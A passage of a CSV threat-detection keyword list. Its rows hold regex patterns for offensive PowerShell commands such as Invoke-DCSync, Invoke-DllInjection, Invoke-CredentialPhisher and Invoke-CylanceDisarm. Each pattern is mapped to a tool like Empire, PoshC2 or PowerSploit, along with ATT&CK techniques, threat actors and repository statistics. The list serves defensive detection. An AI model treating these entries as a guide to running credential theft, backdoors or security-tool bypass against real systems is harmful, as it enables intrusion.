Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48928"
"*Invoke-CredentialPhisher.ps1*",".{0,1000}Invoke\-CredentialPhisher\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48929"
"*Invoke-CredentialsPhish*",".{0,1000}Invoke\-CredentialsPhish.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48930"
"*Invoke-CylanceDisarm -ProcessID * -DisableMemDef*",".{0,1000}Invoke\-CylanceDisarm\s\-ProcessID\s.{0,1000}\s\-DisableMemDef.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","48931"
"*Invoke-DAFT.*",".{0,1000}Invoke\-DAFT\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48932"
"*invoke-daisychain*",".{0,1000}invoke\-daisychain.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48933"
"*Invoke-DatatExfiltration*",".{0,1000}Invoke\-DatatExfiltration.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","48934"
"*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48935"
"*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","48936"
"*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","48937"
"*Invoke-DCOMObjectScan.json*",".{0,1000}Invoke\-DCOMObjectScan\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48938"
"*invoke-dcompayload*",".{0,1000}invoke\-dcompayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48939"
"*Invoke-DCOMPowerPointPivot*",".{0,1000}Invoke\-DCOMPowerPointPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48940"
"*Invoke-DCSync *",".{0,1000}Invoke\-DCSync\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48941"
"*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48942"
"*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48943"
"*Invoke-DCSync.ps1*",".{0,1000}Invoke\-DCSync\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48944"
"*Invoke-DeadUserBackdoor*",".{0,1000}Invoke\-DeadUserBackdoor.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48945"
"*Invoke-DeadUserBackdoor*",".{0,1000}Invoke\-DeadUserBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48946"
"*Invoke-DefenderExclusionsCheck*",".{0,1000}Invoke\-DefenderExclusionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48947"
"*Invoke-DeleteGroup -Tokens * -groupID *",".{0,1000}Invoke\-DeleteGroup\s\-Tokens\s.{0,1000}\s\-groupID\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48948"
"*Invoke-DeleteOAuthApp -Tokens *",".{0,1000}Invoke\-DeleteOAuthApp\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48949"
"*Invoke-DeleteOAuthApp*",".{0,1000}Invoke\-DeleteOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Delete an OAuth App","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48950"
"*Invoke-DHCPCheckup*",".{0,1000}Invoke\-DHCPCheckup.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","48951"
"*Invoke-DinvokeKatz*",".{0,1000}Invoke\-DinvokeKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48952"
"*Invoke-DisableMachineAcctChange*",".{0,1000}Invoke\-DisableMachineAcctChange.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48953"
"*Invoke-DllEncode*",".{0,1000}Invoke\-DllEncode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48954"
"*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","48955"
"*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48956"
"*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48957"
"*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48958"
"*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48959"
"*Invoke-DllInjection.ps1*",".{0,1000}Invoke\-DllInjection\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard 